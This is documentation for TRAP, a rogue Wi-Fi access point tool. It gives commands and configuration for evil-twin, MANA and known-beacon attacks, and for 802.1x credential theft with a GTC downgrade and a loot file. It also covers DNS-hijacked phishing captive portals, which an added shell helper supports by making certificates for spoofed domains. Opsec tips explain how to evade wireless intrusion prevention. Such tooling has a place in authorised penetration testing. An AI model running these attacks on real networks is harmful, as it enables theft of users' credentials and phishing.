TRAP

Generic recommendations for Rogue AP

Opsec Considerations
  • Enable 802.11w (Protected Management Frames) so that clients which negotiate it ignore the unprotected deauthentication frames a WIPS sends to knock them off the rogue AP. This only helps on RSN (WPA2/WPA3) networks with clients that support PMF; an open AP cannot protect its management frames.
  • Spoof the BSSID of a legitimate AP that is out of wireless range. Reusing the BSSID of an AP the client can still hear causes BSS conflicts.
  • A MAC-based Management Frame ACL cannot target specific devices in beacon-based attacks: beacons are broadcast, so every station in range receives them regardless of the ACL. The ACL only controls which stations the AP answers and lets associate.
tip

For EAPHammer hardware modes use the flag --hw-mode (the default is 802.11a or 802.11b depending on the specified channel):

  • 802.11b Older specification, 2.4GHz only.
  • 802.11a Used for creating 5GHz access points.
  • 802.11g Used for creating 2.4GHz access points.
  • 802.11n Can be used on both the 2.4GHz and 5GHz spectrums (20MHz channels by default; use --channel-width 40 for 40MHz).

Installation tested on Kali 2020.3

git clone https://github.com/Piosky/TRAP.git
apt update
apt install nginx dnsmasq
info

If you have iptables compatibility issues, select /usr/sbin/iptables-nft when prompted by:

update-alternatives --config iptables
info

For ARM distributions only:

mv scripts/hostapd-eaphammer.arm scripts/hostapd-eaphammer
warning

Please note that the hostapd-eaphammer binaries are dynamically linked, so they depend on the shared libraries of the host they were built on. If the binary fails to start, run ldd against it to find unresolved libraries; you may have to compile your own version of hostapd-eaphammer.

Check the options

python3 trap -h

Configuration files

All the configuration files are stored in the config folder.

802.1x configuration

Certificates

The certificates used for 802.1x authentication are stored in config/1/eap/certs or config/2/eap/certs, depending on the instance number specified.

You can create the 802.1x certificates using TRAP:

python3 trap --cert <instance_number>

If you provide your own certificates, name the files ca.pem, server.pem, privkey.pem and dhparam.pem. A server certificate whose issuer and common name resemble the target's real RADIUS server is more likely to be accepted by clients (or their users) that do not validate the server certificate properly.

Known credentials

If you know valid 802.1x credentials, put them in the config/eap/known_creds.txt file. Clients presenting those credentials then authenticate successfully instead of being rejected, which makes the rogue AP less conspicuous.

Each line must contain the username and the password separated by a tab.

Captive portal configuration

Captive sites

All web sites to be spoofed via DNS hijacking are listed in the config/captive_sites.txt file.

Rogue web sites

The web root directory is config/captive_portal/nginx/www. You can set up your own phishing scenario by modifying the web site and the nginx configuration accordingly.

SSL configuration

You have to create a folder named after the domain name:

config/captive_portal/nginx/ssl/<domain_name>

This folder must contain three files named:

  • fullchain.pem
  • privkey.pem
  • ssl-dhparams.pem
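Added example, not part of TRAP or its documentation: a POSIX shell helper that creates the folder and the three files listed above with a self-signed certificate, then checks that the private key actually matches the certificate before nginx is pointed at it (a mismatch only shows up as an nginx start failure at attack time). The function names, the example domain portal.example.test, the 30-day validity and the use of -dsaparam for fast Diffie-Hellman parameter generation are assumptions of this example; requires OpenSSL 1.1.1 or newer for -addext.

```shell
#!/bin/sh
# Added example (not TRAP's own code): populate
# config/captive_portal/nginx/ssl/<domain_name> with the three files TRAP expects.
# Usage: make_trap_ssl_dir <domain> [base_dir]   (base_dir is an assumed parameter)
make_trap_ssl_dir() {
    domain="$1"
    base="${2:-config/captive_portal/nginx/ssl}"
    dir="$base/$domain"
    mkdir -p "$dir" || return 1
    # Self-signed leaf certificate with a SAN for the spoofed domain. Browsers will
    # warn on it; that is the usual trade-off unless a trusted cert is obtained elsewhere.
    openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 30 \
        -keyout "$dir/privkey.pem" -out "$dir/fullchain.pem" \
        -subj "/CN=$domain" -addext "subjectAltName=DNS:$domain" 2>/dev/null || return 1
    # DH parameters for nginx's ssl_dhparam directive. -dsaparam makes generation
    # take well under a second; drop it to get a conventional safe-prime group instead.
    openssl dhparam -dsaparam -out "$dir/ssl-dhparams.pem" 2048 2>/dev/null || return 1
    chmod 600 "$dir/privkey.pem"
    echo "$dir"
}

# Sanity check: all three files present and the key's public half equals the
# certificate's public key, so nginx will not reject the pair at startup.
check_trap_ssl_dir() {
    dir="$1"
    [ -s "$dir/fullchain.pem" ] && [ -s "$dir/privkey.pem" ] && [ -s "$dir/ssl-dhparams.pem" ] || return 1
    cert_pub=$(openssl x509 -in "$dir/fullchain.pem" -noout -pubkey 2>/dev/null)
    key_pub=$(openssl pkey -in "$dir/privkey.pem" -pubout 2>/dev/null)
    [ -n "$cert_pub" ] && [ "$cert_pub" = "$key_pub" ]
}

# Example run:
#   d=$(make_trap_ssl_dir portal.example.test) && check_trap_ssl_dir "$d" && echo "ok: $d"
```

Point the --ssl option at the same <domain_name> you passed to the helper; the domain also has to be one that the captive_sites.txt hijack resolves to the portal, otherwise the certificate is never served.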

802.1x authentication materials loot file

All gathered 802.1x credentials and hashes are stored in config/<instance_number>/loot_eap.txt.

Usage

For all types of rogue access point, the option --captive-portal or -w enables the captive portal feature, which serves phishing pages selected according to the client's User-Agent.

Open AP

Create an open rogue access point.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID>

WPA2 PSK AP

Create a WPA2 PSK rogue access point.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> -p <PSK>

802.1x AP

Create an 802.1x rogue access point to steal credentials.

You can perform a GTC downgrade by specifying its mode (full/weakest/balanced) via the option --downgrade.

It uses EAPHammer's GTC downgrade methodology, as described in the EAPHammer documentation.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --eap [--downgrade balanced]

Management Frame ACL

The list files must contain one BSSID or ESSID per line.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --bssid-whitelist </path/to/bssid_whitelist.txt>
python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --bssid-blacklist </path/to/bssid_blacklist.txt>
python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --ssid-whitelist </path/to/ssid_whitelist.txt>
python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --ssid-blacklist </path/to/ssid_blacklist.txt>

MANA

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -m

Known beacon attack

Known ESSIDs are stored in config/<instance_number>/known_ssid.txt, one per line.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --mana --known-beacons

Captive Portal

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> -w

SSL domain

The captive portal option must be set when --ssl is used, and the folder config/captive_portal/nginx/ssl/<domain_name> must exist for the given domain.

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --captive-portal --ssl <domain_name>

Channel bonding

It is possible to enable channel bonding to create 40MHz channels using the option --ht. Channel bonding is an 802.11n feature, so use it with the 802.11n hardware mode.

Cleaning

This removes all generated configuration and loot files, except the files under the captive_portal folder.

python3 trap --clean

Specifications when using two instances of TRAP

When two instances are running, the first instance decides whether the captive portal is enabled or not.